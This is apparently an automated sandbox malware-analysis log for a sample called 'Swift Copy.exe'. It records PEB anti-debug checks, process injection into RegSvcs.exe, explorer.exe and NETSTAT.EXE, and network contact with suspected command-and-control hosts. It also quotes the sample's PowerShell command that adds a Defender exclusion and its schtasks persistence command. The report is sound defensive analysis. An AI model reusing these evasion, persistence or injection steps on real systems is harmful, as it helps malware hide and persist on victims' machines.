          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0194A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01903D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01943540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01973D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01908EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80
          Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
          Source: C:\Windows\explorer.exe Network Connect: 103.67.235.120 80
          Source: C:\Windows\explorer.exe Network Connect: 192.3.130.2 80
          Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
          Source: C:\Windows\explorer.exe Network Connect: 51.159.175.169 80
          Source: C:\Windows\explorer.exe Domain query: www.blackyaga.xyz
          Source: C:\Windows\explorer.exe Domain query: www.epic45.co.uk
          Source: C:\Windows\explorer.exe Domain query: www.expectedclosure.one
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10F1008
          Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe"
          Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe"
          Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe"
          Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp"
          Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: explorer.exe, 0000000B.00000000.380716731.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.334501812.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287445550.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.339209169.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.306173518.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.381188687.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.317860532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287493311.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Users\user\Desktop\Swift Copy.exe VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
